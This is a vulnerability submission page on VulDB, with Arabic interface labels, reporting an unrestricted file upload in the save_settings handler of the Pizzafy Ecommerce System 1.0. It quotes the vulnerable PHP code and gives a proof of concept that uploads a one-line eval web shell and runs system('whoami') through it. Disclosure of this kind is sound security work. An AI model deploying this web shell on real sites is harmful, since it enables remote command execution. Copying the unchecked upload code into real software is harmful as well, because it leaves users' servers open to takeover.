إرسال #858229: SourceCodester Pizzafy Ecommerce System using PHP and MySQL 1.0 Unrestricted Uploadالمعلومات

عنوانSourceCodester Pizzafy Ecommerce System using PHP and MySQL 1.0 Unrestricted Upload
الوصفSourceCodester Pizzafy Ecommerce System using PHP and MySQL 1.0 is affected by an unrestricted file upload vulnerability in the save_settings function of the file /admin/admin_class_novo.php (endpoint /admin/ajax.php?action=save_settings, the Site Settings / Setting Handler component). The handler reads the uploaded "Image" file from $_FILES['img'], builds the destination path from the attacker-controlled original filename ($_FILES['img']['name']) and moves it into the web-accessible directory ../assets/img/ via move_uploaded_file(). Although the file extension is computed with pathinfo(), it is never validated against an allow-list, and there is no MIME/content-type check and no filename randomization. As a result, files of any type (including .php) are stored under a predictable, directly reachable URL. Affected code (admin_class_novo.php, save_settings): if(!isset($_SESSION['login_id'])) { return 2; } if(isset($_FILES['img']) && $_FILES['img']['tmp_name'] != '') { $target_dir = "../assets/img/"; $file_name = $_FILES['img']['name']; $target_file = $target_dir . $file_name; $imageFileType = strtolower(pathinfo($target_file, PATHINFO_EXTENSION)); if(move_uploaded_file($_FILES['img']['tmp_name'], $target_file)) { ... } } Impact: an authenticated administrator can upload a PHP file and execute arbitrary OS commands (remote code execution) in the context of the web server. Proof of Concept: 1. Log in to the admin panel. 2. Open /admin/index.php?page=site_settings. 3. In the Image field (name="img") upload poc.php containing: <?php eval($_GET[1]); ?> 4. Submit; the form posts to /admin/ajax.php?action=save_settings and the file is stored at /assets/img/poc.php. 5. Request /assets/img/poc.php?1=system('whoami'); to execute commands. This vulnerability requires an authenticated administrator session. CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H (7.2). Note: this is a different sink than CVE-2026-7393, which affects the save_menu function; this report concerns the save_settings function.
المصدر⚠️ https://github.com/leidyardila981-creator/Pizzafy-Ecommerce-1.0-save_settings-File-Upload-RCE
المستخدم
 q1w2e3r4t5y6 (UID 98995)
ارسال14/06/2026 04:45 PM (1 شهر منذ)
الاعتدال18/07/2026 02:31 PM (1 month later)
الحالةتمت الموافقة
إدخال VulDB380048 [SourceCodester Pizzafy Ecommerce System 1.0 admin_class_novo.php save_settings img تجاوز الصلاحيات]
النقاط20

Are you interested in using VulDB?

Download the whitepaper to learn more about our service!